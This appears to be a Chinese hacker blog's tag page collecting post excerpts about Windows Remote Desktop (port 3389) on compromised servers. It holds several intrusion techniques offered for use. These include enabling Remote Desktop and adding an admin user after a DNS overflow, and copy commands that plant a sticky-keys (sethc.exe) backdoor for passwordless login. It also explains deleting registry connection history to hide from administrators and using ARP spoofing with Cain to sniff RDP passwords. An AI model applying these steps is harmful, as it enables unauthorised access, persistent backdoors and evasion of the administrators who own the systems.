标签 ‘3389’ 下的日志

浅谈CMD下开启远程桌面服务

2007/09/21 2:18 | 鬼仔 | 技术文章 | 消灭0回复

题目:浅谈CMD下开启远程桌面服务
作者:hackest&shockboy [H.S.T]&[E.S.T]&[L.S.T]

此文章已发表在《黑客X档案》第7期杂志上

一、缘起

近段时间微软出现的DNS溢出漏洞疯狂了一段时间,就是现在也还有许多服务器可以成功溢出。相信大家都有体验过溢出的经验了吧,嘿嘿。但是当我们溢出成功后,返回得到的就只有一个system权限的cmdshell。要是服务器开启了远程桌面服务,那我们直接加一个用户,再添加进管理员组,就可以登录服务器了。这样的话,拿下存在DNS溢出的服务器只是分秒间的事情。从溢出到得到服务器控制权花不了多少时间。不过,要是服务器本身没有开启远程桌面服务,就相对来说比较麻烦一点了。话虽如此,服务器本身没开,那我们就帮它开嘛,嘿嘿。
阅读全文 »

Tags:

无需输入密码登陆3389

2007/09/01 9:07 | 鬼仔 | 技术文章 | 消灭0回复

鬼仔注:附带TT写的一个bat,方便些。

来源:脚本安全小组

在肉鸡上执行命令

copy c:\windows\explorer.exe c:\windows\system32\sethc.exe

copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe

以后再连接肉鸡3389,敲5下shift键就可以直接进入了,无需输入密码,只是登陆上去没有任务栏,一直会有密码登陆框,不过够我们做很多事情了,目前win2003测试通过。

似乎2000也可以,XP不行。这两个系统没测试。

不知道有牛人知道是什么道理不.

小道消息:连敲5次shift就自动激活连滞键设置~~也就是自动执行sethc.exe 阅读全文 »

Tags:

3389登录日志清除软件

2007/08/13 11:15 | 鬼仔 | 工具收集 | 消灭0回复

软件作者:pt007[at]vip.sina.com版权所有,转载请注明版权
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
阅读全文 »

Tags: ,

3389登陆记录的清除

2007/05/10 7:32 | 鬼仔 | 技术文章 | 消灭0回复

来源:慕容小语's Blog

很多时候,因为内网信任或者vlan等我们在外面连不上目标的3389终端,又不可能每次都靠反弹后门来htran

一般来说,可以在内网信任的任何一台机器(比如web)上来直接mstsc来连接内网ip

默认是空记录,或者是仅有几个被连接过的ip记录,当我们连接完内网新的ip的时候,连接记录会默认显示出来,很苦恼啊。有经验的管理员基本上都可以发现

清理很简单

HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default
把右边显示出来的,非原有的ip键值直接DEL就可以啦~~但是千万记住默认注册表打开的时候,当前键值是在哪儿(一般是主键,没有分树),照着默认一打开时候的树状模样恢复就ok

还是那句话,我们主要是针对有经验的管理员^-^

Tags: ,

解决Win服务器终端连接用户过多的方法

2007/05/06 11:13 | 鬼仔 | 技术文章 | 4 个回复

鬼仔注:XP sp3下,取消了/console参数,换成了/admin,mstsc.exe 6.0.6001

/console 连接到服务器的控制台会话

来源:cnfjhh’s blog

不必用logoff id 去T管理了
用下面这个就ok:
运行里输入
mstsc /console /v:IP:终端端口

Tags:

3389密码的嗅探

2007/02/04 1:34 | 鬼仔 | 技术文章 | 消灭0回复

来源:凋凌玫瑰's blog

Arp欺骗加嗅探,玩黑的朋友一定不会陌生,大家玩得最多的就是在同网段中嗅探ftp的密码,所以一般都喜欢渗透的主站开个ftp,但更多的时候是主站开3389的机率要比ftp大吧,如果能直接嗅探3389岂不是更爽。
Cain是大家都熟悉的一款软件,具有arp欺骗加嗅探和密码破解的功能,这里提供一个最新版的下载地址: http://www.ncph.net/cain.exe ,具体用法就不多讲了,相信大家都会用这个。本来cain就自带了嗅探终端(3389)密码的功能,但没有听用过,以前我也没有用过这个功能,但一次无意间使用嗅探时开了嗅探3389的功能,最后其它的什么都没有嗅探到,去嗅探到了一个RDP值,打开一分析,原来3389的密码就在其中。
很多朋友看了我的blog 阅读全文 »

Tags:

Windows XP/Server 2003 的远程桌面连接6.0

2007/02/01 2:35 | 鬼仔 | 工具收集 | 消灭0回复

可以在运行 Windows XP Service Pack 2 和 Windows Server 2003 Service Pack 1 的客户端计算机上安装此版本的远程桌面连接 (Terminal Services Client 6.0). 它可用于连接到运行早期 Windows 版本的终端服务器或远程桌面, 但是, 只有当远程计算机运行的是 Windows Vista 或 Windows Server (代码名称为 "Longhorn" ) 时, 新功能才可用.

用于 Windows XP 的远程桌面连接
下载地址:
查看信息
WINDOWSXP-KB925876-X86-CHS.EXE

用于 Windows Server 2003 的远程桌面连接
下载地址:
查看信息
WINDOWSSERVER2003-KB925876-X86-CHS.EXE

Tags: ,

Windows XP 3389(终端)多用户登陆

2006/12/06 7:20 | 鬼仔 | 技术文章 | 2 个回复

鬼仔:该文的方法比较方便,以一个批处理来完成。文章前半部分介绍原理,后半部分才算是正题。原文中所给的 TermSrv.DLL 的下载链接是一个论坛的,已经失效,我又到那个论坛找了一个 TermSrv.DLL ,同样是英文Build 2055版的 termsrv.zip
来源:野球小子'BLOG

第一步:首先是在Windows XP上安装SP2正式版,按照常规方式安装即可,这里不再赘述。

第二步:准备一份版本较早的SP2终端服务器软件(据说从Build 2082开始该功能就被禁止了,所以最好使用之前版本),中文SP2测试版较难找到,我用的是英文版Build 阅读全文 »

Tags: